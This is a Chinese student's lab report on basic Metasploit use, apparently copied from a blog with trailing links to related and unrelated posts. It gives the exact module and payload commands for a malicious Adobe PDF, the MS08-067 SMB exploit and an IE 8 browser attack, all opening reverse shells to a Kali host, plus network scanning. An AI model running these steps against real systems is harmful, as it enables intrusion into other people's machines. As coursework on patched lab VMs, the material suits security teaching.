20145205武钰_Exp5 MSF基础应用
20145205武钰_Exp5 MSF基础应用
实验后回答问题
exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词,就是个指令代码,并没有什么特别的,就是我们需要在MSF中进行执行了,敲一下就好。
payload:其实吧我对这个词理解不深,就感觉是我们的恶意代码要在靶机中可以做的事情,其实就是我们生产的恶意代码具体可以干什么。
encode:在我们学习了英语后我们都知道“en”是一个动词,所以encode就是对于我们之前的恶意代码进行一个再编译的过程,达到我们的目的——免杀
实验感想
我们这个的实验是用已经被修补的漏洞,然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉,只要我们平时及时下载补丁,修补我们的漏洞,其实黑客是很难对我们进行漏洞的渗透攻击的,而且我们也要注意上网习惯,注意一些的奇怪的域名,小心被“钓鱼“,而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描,获得目标靶机的IP地址,之后进行主动攻击,获得目标机的权限,之后或是传输到靶机生产的PDF文件,或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。
还有就是为了找到一个和大家不相同的漏洞,本来是想在MSF里直接搜一个挑个来做的,但是密密麻麻的英文让我退却了,然后就在百度上自己随便输了个漏洞年号,之后去看常用的搜索项,也是佩服我自己的聪明才智。
实践过程记录
Adobe阅读器渗透攻击
实验准备
两台虚拟机,其中一台为
kali,一台为windows xp sp3首先在实验前我们可以打开KALI中的显示隐藏文件夹,或是我们不打开显示隐藏文件,可以使用我们的之前实验中用到的netcat进行传输。
还要注意的一点是保证两台虚拟机可以ping通,无论是nat还是桥接通了就可以,为了ping通的话需要关闭防火墙。
实验步骤
- 在kali终端中开启msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing进入该漏洞模块 - 使用命令
set payload windows/meterpreter/reverse_tcp设置攻击有效载荷 - 输入命令
show options显示模块设定参数,然后按照我们自己的情况进行修改

- 在设定完成后,生产PDF文件,然后将PDF文件拖入到靶机中,之后就像是我们之前做的恶意代码实验一样。
- 建立一个监听模块,
use exploit/multi/handler - 使用
set payload windows/meterpreter/reverse_tcp建立一个可靠的反弹链接,监听模块的端口也是需要我们按照自己的情况进行设定的。 - 最后
exploit开启监听模块在靶机中打开问题PDF,即可获得靶机权限。

- 但是这种方式靶机那边的PDF并不会打开,就像是程序崩溃的感觉一样,但是如果关闭了问题PDF文件,靶机同kali的链接就会中断,而且我们也可以通过网络资源发现靶机正在和kali进行链接。

MS08_067漏洞渗透攻击实践
实验准备
- 两台虚拟机,其中一台为
kali,一台为windows xp sp3 - 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先我们在知道了具体的漏洞号之后,在进行MSF后,输入
search ms08_067,会显示出找到的渗透模块,如下图所示:

- 输入
use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用,在输入命令时时不时TAB一下会省很多功夫,建议没事多点一下TAB - 之后依然是设置有效攻击载荷,输入
set payload generic/shell_reverse_tcp进入载荷模块,之后show options查看具体参数,然后修改参数。

- 这里我们需要注意点的一点是,
LHOST是本机地址,RHOST是靶机IP,设置好后,输入我们的开启攻击的号角exploit

- 对比可知我们获得了靶机的管理员权限

IE浏览器渗透攻击——MS11030安全漏洞
实验准备
- 两台虚拟机,其中一台为
kali,一台为windows 7,浏览器版本为IE 8 - 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先进入漏洞模块,因为我们已知漏洞号之间进行漏洞模块,进入之后显示一下参数,然后根据我们的自身情况设置一下参数

- 这里我们设置的错误路径为
baidu.com,端口自己随意就好,尽量不要和已知使用端口占用进行冲突,然后我们设置攻击载荷。

- 还是老套路,根据自己kali情况设置本地IP和端口,之后输入
exploit启动漏洞服务,等待靶机那个“一个不小心”输入了一长串我们的钓鱼网址

- 这时在靶机的浏览器中输入
http://kali ip:port/uripath也就是输入对应的我们上面设置的参数

- 稍作等待,kali这边就会有成功链接的反应

- 之后输入
sessions查看一下MSF中的会话情况,找到我们和win7的会话编号

- 输入
sessions -i 会话ID进入我们要进入的会话中,就会发现我们以后获取了靶机的权限


- 这是我们
win 7的IP地址

辅助模块的实践
实验前准备
- 将kali机的模式改为桥接模式,因为这个在实际应用中最好我们可以使用公网地址,虽然这样会被抓,或是在无线局域网中使用桥接模式,可以保证和其他在这个局域网中的主机在同一个网段中,可以ping通。
- 本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
- 为了提升一下扫描速度,我们可以预先建立msf数据库,在kali的终端中依次输入以下命令
service postgresql start之后输入msfdb start - 然后进入msf
- 输入
use auxiliary/scanner/discovery/arp_sweep进入模块,然后输入show options查看并修改参数

- 然后根据自身的情况修改参数

- 然后就可以开始扫描了了,因为是辅助模块,并没有进行漏洞渗透攻击,所以我们的启动指令是
run,然后可以看到这个局域网中除了自己的主机,其他的主机,因为我当时只开了kali,所以只会扫描到我的win 10主机

- 在确认可以ping通后,使用nmap进行开放端口扫描,探知该主机开放的端口和服务

20145205武钰_Exp5 MSF基础应用的更多相关文章
- 20145218张晓涵_Exp5 MSF基础应用
20145218张晓涵_Exp5 MSF基础应用 实验原理 MS08-067漏洞描述 MS08-067漏洞的全称为"Windows Server服务RPC请求缓冲区溢出漏洞",如果 ...
- 20145205 武钰 《网络对抗》Exp8 Web基础
一点题外话 本次实验我三号完成的,由于一些原因吧,一直没发博客,拖到了现在,这里说就是评判一下自己的懒惰. 实验后问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能. 一个表单有三个基本组成 ...
- 20145205武钰《网络对抗》web安全基础实践
实验后问题回答 (1)SQL注入攻击原理,如何防御 攻击原理:SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的 防御手 ...
- 20165223《网络对抗技术》Exp5 MSF基础应用
目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netap ...
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 20155324 实验5 MSF基础应用
20155324 实验5 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 服务器信息块(SMB)是一个网络文件共享协议,它允许应用程序和终端用户从远端的 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用
实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
随机推荐
- 【转】MVC中的扩展点
原文地址:http://www.cnblogs.com/xfrog/tag/MVC/ MVC中的扩展点(十)辅助方法 MVC中的扩展点(九)验证 MVC中的扩展点(八)模型绑定 ...
- split和strip的使用
我觉得都可以进行分隔,但最大的不同就是一个返回list,一个返回字符串 s1 = 'deng ye xun' s1.split() Out[8]: ['deng', 'ye', 'xun'] s1.s ...
- Centralized Cache Management in HDFS
Overview(概述) Centralized cache management in HDFS is an explicit caching mechanism that allows users ...
- Cloudrea manager5安装CDH5文档
一.主机规划.存储规划 服务器配置信息:CentOS6.5 最小化安装+development tools组包,其余组件yum安装即可. 二.系统设置如下: 1.服务器信息如下(/etc/hosts文 ...
- 自动布局又出问题-HPPGCTableViewCell
[self.firstComment mas_makeConstraints:^(MASConstraintMaker *make) { make.top.mas_equalTo(sel ...
- 解决eslint空格报错等问题
eslint检查代码风格是好的,不过 有些换行报错 空格报错 还有在代码中有 console也是报错 这有些烦人 为了把这些烦人的报错给禁止掉 我们可以在package.json文件中 找到 ...
- 【2014腾讯实习招聘-面试-移动client开发】
版权声明:本文为博主原创文章,欢迎转载,转载请注明出处. https://blog.csdn.net/kana007/article/details/24375423 个人学习整理.如 ...
- [LeetCode] 161. One Edit Distance_Medium
Given two strings s and t, determine if they are both one edit distance apart. Note: There are 3 pos ...
- 什么时候block 是放在全局区里面的?
When a Block literal is written where there are global variables When the syntax in a Block literal ...
- javascript实现unicode与字符互相转换
javascript实现unicode与字符互相转换. <script language="javascript"> //手机检测 function checkMo ...